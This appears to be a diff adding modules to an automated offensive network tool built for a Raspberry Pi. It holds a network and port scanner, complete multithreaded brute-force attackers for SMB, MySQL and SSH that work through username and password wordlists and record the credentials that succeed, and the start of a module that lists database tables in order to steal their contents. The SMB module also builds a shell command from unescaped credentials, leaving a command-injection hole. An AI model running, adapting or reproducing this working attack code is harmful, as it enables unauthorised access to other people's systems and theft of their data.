formatted_row = [Text(cell, style="green bold") if cell else Text("", style="on red") for cell in row]
table.add_row(*formatted_row)
self.console.print(table)
except Exception as e:
self.logger.error(f"Error in display_csv: {e}")
def get_network(self):
"""
Retrieves the network information including the default gateway and subnet.
"""
try:
gws = netifaces.gateways()
default_gateway = gws['default'][netifaces.AF_INET][1]
iface = netifaces.ifaddresses(default_gateway)[netifaces.AF_INET][0]
ip_address = iface['addr']
netmask = iface['netmask']
cidr = sum([bin(int(x)).count('1') for x in netmask.split('.')])
network = ipaddress.IPv4Network(f"{ip_address}/{cidr}", strict=False)
self.logger.info(f"Network: {network}")
return network
except Exception as e:
self.logger.error(f"Error in get_network: {e}")
def get_mac_address(self, ip, hostname):
"""
Retrieves the MAC address for the given IP address and hostname.
"""
try:
mac = None
retries = 5
while not mac and retries > 0:
mac = gma(ip=ip)
if not mac:
time.sleep(2) # Attendre 2 secondes avant de réessayer
retries -= 1
if not mac:
mac = f"{ip}_{hostname}" if hostname else f"{ip}_NoHostname"
return mac
except Exception as e:
self.logger.error(f"Error in get_mac_address: {e}")
return None
class PortScanner:
"""
Helper class to perform port scanning on a target IP.
"""
def __init__(self, outer_instance, target, open_ports, portstart, portend, extra_ports):
self.outer_instance = outer_instance
self.logger = logger
self.target = target
self.open_ports = open_ports
self.portstart = portstart
self.portend = portend
self.extra_ports = extra_ports
def scan(self, port):
"""
Scans a specific port on the target IP.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
try:
con = s.connect((self.target, port))
self.open_ports[self.target].append(port)
con.close()
except:
pass
finally:
s.close() # Ensure the socket is closed
def start(self):
"""
Starts the port scanning process for the specified range and extra ports.
"""
try:
for port in range(self.portstart, self.portend):
t = threading.Thread(target=self.scan_with_semaphore, args=(port,))
t.start()
for port in self.extra_ports:
t = threading.Thread(target=self.scan_with_semaphore, args=(port,))
t.start()
except Exception as e:
self.logger.info(f"Maximum threads defined in the semaphore reached: {e}")
def scan_with_semaphore(self, port):
"""
Scans a port using a semaphore to limit concurrent threads.
"""
with self.outer_instance.semaphore:
self.scan(port)
class ScanPorts:
"""
Helper class to manage the overall port scanning process for a network.
"""
def __init__(self, outer_instance, network, portstart, portend, extra_ports):
self.outer_instance = outer_instance
self.logger = logger
self.progress = 0
self.network = network
self.portstart = portstart
self.portend = portend
self.extra_ports = extra_ports
self.currentdir = outer_instance.currentdir
self.scan_results_dir = outer_instance.shared_data.scan_results_dir
self.timestamp = outer_instance.get_current_timestamp()
self.csv_scan_file = os.path.join(self.scan_results_dir, f'scan_{network.network_address}_{self.timestamp}.csv')
self.csv_result_file = os.path.join(self.scan_results_dir, f'result_{network.network_address}_{self.timestamp}.csv')
self.netkbfile = outer_instance.shared_data.netkbfile
self.ip_data = None
self.open_ports = {}
self.all_ports = []
self.ip_hostname_list = []
def scan_network_and_write_to_csv(self):
"""
Scans the network and writes the results to a CSV file.
"""
self.outer_instance.check_if_csv_scan_file_exists(self.csv_scan_file, self.csv_result_file, self.netkbfile)
with self.outer_instance.lock:
try:
with open(self.csv_scan_file, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(['IP', 'Hostname', 'MAC Address'])
except Exception as e:
self.outer_instance.logger.error(f"Error in scan_network_and_write_to_csv (initial write): {e}")
# Use nmap to scan for live hosts
self.outer_instance.nm.scan(hosts=str(self.network), arguments='-sn')
for host in self.outer_instance.nm.all_hosts():
t = threading.Thread(target=self.scan_host, args=(host,))
t.start()
time.sleep(5)
self.outer_instance.sort_and_write_csv(self.csv_scan_file)
def scan_host(self, ip):
"""
Scans a specific host to check if it is alive and retrieves its hostname and MAC address.
"""
if self.outer_instance.blacklistcheck and ip in self.outer_instance.ip_scan_blacklist:
return
try:
hostname = self.outer_instance.nm[ip].hostname() if self.outer_instance.nm[ip].hostname() else ''
mac = self.outer_instance.get_mac_address(ip, hostname)
if not self.outer_instance.blacklistcheck or mac not in self.outer_instance.mac_scan_blacklist:
with self.outer_instance.lock:
with open(self.csv_scan_file, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow([ip, hostname, mac])
self.ip_hostname_list.append((ip, hostname, mac))
except Exception as e:
self.outer_instance.logger.error(f"Error getting MAC address or writing to file for IP {ip}: {e}")
self.progress += 1
time.sleep(0.1) # Adding a small delay to avoid overwhelming the network
def get_progress(self):
"""
Returns the progress of the scanning process.
"""
return (self.progress / self.total_ips) * 100
def start(self):
"""
Starts the network and port scanning process.
"""
self.scan_network_and_write_to_csv()
time.sleep(7)
self.ip_data = self.outer_instance.GetIpFromCsv(self.outer_instance, self.csv_scan_file)
self.open_ports = {ip: [] for ip in self.ip_data.ip_list}
with Progress() as progress:
task = progress.add_task("[cyan]Scanning IPs...", total=len(self.ip_data.ip_list))
for ip in self.ip_data.ip_list:
progress.update(task, advance=1)
port_scanner = self.outer_instance.PortScanner(self.outer_instance, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
port_scanner.start()
self.all_ports = sorted(list(set(port for ports in self.open_ports.values() for port in ports)))
alive_ips = set(self.ip_data.ip_list)
return self.ip_data, self.open_ports, self.all_ports, self.csv_result_file, self.netkbfile, alive_ips
class LiveStatusUpdater:
"""
Helper class to update the live status of hosts and clean up scan results.
"""
def __init__(self, source_csv_path, output_csv_path):
self.logger = logger
self.source_csv_path = source_csv_path
self.output_csv_path = output_csv_path
def read_csv(self):
"""
Reads the source CSV file into a DataFrame.
"""
try:
self.df = pd.read_csv(self.source_csv_path)
except Exception as e:
self.logger.error(f"Error in read_csv: {e}")
def calculate_open_ports(self):
"""
Calculates the total number of open ports for alive hosts.
"""
try:
alive_df = self.df[self.df['Alive'] == 1].copy()
alive_df.loc[:, 'Ports'] = alive_df['Ports'].fillna('')
alive_df.loc[:, 'Port Count'] = alive_df['Ports'].apply(lambda x: len(x.split(';')) if x else 0)
self.total_open_ports = alive_df['Port Count'].sum()
except Exception as e:
self.logger.error(f"Error in calculate_open_ports: {e}")
def calculate_hosts_counts(self):
"""
Calculates the total and alive host counts.
"""
try:
# self.all_known_hosts_count = self.df.shape[0]
self.all_known_hosts_count = self.df[self.df['MAC Address'] != 'STANDALONE'].shape[0]
self.alive_hosts_count = self.df[self.df['Alive'] == 1].shape[0]
except Exception as e:
self.logger.error(f"Error in calculate_hosts_counts: {e}")
def save_results(self):
"""
Saves the calculated results to the output CSV file.
"""
try:
if os.path.exists(self.output_csv_path):
results_df = pd.read_csv(self.output_csv_path)
results_df.loc[0, 'Total Open Ports'] = self.total_open_ports
results_df.loc[0, 'Alive Hosts Count'] = self.alive_hosts_count
results_df.loc[0, 'All Known Hosts Count'] = self.all_known_hosts_count
results_df.to_csv(self.output_csv_path, index=False)
else:
self.logger.error(f"File {self.output_csv_path} does not exist.")
except Exception as e:
self.logger.error(f"Error in save_results: {e}")
def update_livestatus(self):
"""
Updates the live status of hosts and saves the results.
"""
try:
self.read_csv()
self.calculate_open_ports()
self.calculate_hosts_counts()
self.save_results()
self.logger.info("Livestatus updated")
self.logger.info(f"Results saved to {self.output_csv_path}")
except Exception as e:
self.logger.error(f"Error in update_livestatus: {e}")
def clean_scan_results(self, scan_results_dir):
"""
Cleans up old scan result files, keeping only the most recent ones.
"""
try:
files = glob.glob(scan_results_dir + '/*')
files.sort(key=os.path.getmtime)
for file in files[:-20]:
os.remove(file)
self.logger.info("Scan results cleaned up")
except Exception as e:
self.logger.error(f"Error in clean_scan_results: {e}")
def scan(self):
"""
Initiates the network scan, updates the netkb file, and displays the results.
"""
try:
self.shared_data.bjornorch_status = "NetworkScanner"
self.logger.info(f"Starting Network Scanner")
network = self.get_network()
self.shared_data.bjornstatustext2 = str(network)
portstart = self.shared_data.portstart
portend = self.shared_data.portend
extra_ports = self.shared_data.portlist
scanner = self.ScanPorts(self, network, portstart, portend, extra_ports)
ip_data, open_ports, all_ports, csv_result_file, netkbfile, alive_ips = scanner.start()
alive_macs = set(ip_data.mac_list)
table = Table(title="Scan Results", show_lines=True)
table.add_column("IP", style="cyan", no_wrap=True)
table.add_column("Hostname", style="cyan", no_wrap=True)
table.add_column("Alive", style="cyan", no_wrap=True)
table.add_column("MAC Address", style="cyan", no_wrap=True)
for port in all_ports:
table.add_column(f"{port}", style="green")
netkb_data = []
for ip, ports, hostname, mac in zip(ip_data.ip_list, open_ports.values(), ip_data.hostname_list, ip_data.mac_list):
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
alive = '1' if mac in alive_macs else '0'
row = [ip, hostname, alive, mac] + [Text(str(port), style="green bold") if port in ports else Text("", style="on red") for port in all_ports]
table.add_row(*row)
netkb_data.append([mac, ip, hostname, ports])
with self.lock:
with open(csv_result_file, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(["IP", "Hostname", "Alive", "MAC Address"] + [str(port) for port in all_ports])
for ip, ports, hostname, mac in zip(ip_data.ip_list, open_ports.values(), ip_data.hostname_list, ip_data.mac_list):
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
alive = '1' if mac in alive_macs else '0'
writer.writerow([ip, hostname, alive, mac] + [str(port) if port in ports else '' for port in all_ports])
self.update_netkb(netkbfile, netkb_data, alive_macs)
if self.displaying_csv:
self.display_csv(csv_result_file)
source_csv_path = self.shared_data.netkbfile
output_csv_path = self.shared_data.livestatusfile
updater = self.LiveStatusUpdater(source_csv_path, output_csv_path)
updater.update_livestatus()
updater.clean_scan_results(self.shared_data.scan_results_dir)
except Exception as e:
self.logger.error(f"Error in scan: {e}")
def start(self):
"""
Starts the scanner in a separate thread.
"""
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.scan)
self.thread.start()
logger.info("NetworkScanner started.")
def stop(self):
"""
Stops the scanner.
"""
if self.running:
self.running = False
if self.thread.is_alive():
self.thread.join()
logger.info("NetworkScanner stopped.")
if __name__ == "__main__":
shared_data = SharedData()
scanner = NetworkScanner(shared_data)
scanner.scan()

261
actions/smb_connector.py Normal file
View File

@@ -0,0 +1,261 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

204
actions/sql_connector.py Normal file
View File

@@ -0,0 +1,204 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# Première tentative sans spécifier de base de données
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# Si la connexion réussit, récupérer la liste des bases de données
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Sauvegarder les informations avec la liste des bases trouvées
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Ajouter une entrée pour chaque base de données trouvée
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

198
actions/ssh_connector.py Normal file
View File

@@ -0,0 +1,198 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Démarrage de l'attaque SSH... sur le port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

189
actions/steal_data_sql.py Normal file
View File

@@ -0,0 +1,189 @@
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
try:
# Si aucune base n'est spécifiée, on se connecte sans base
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
return []
query = """
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
except Exception as e:
logger.error(f"Error finding tables: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
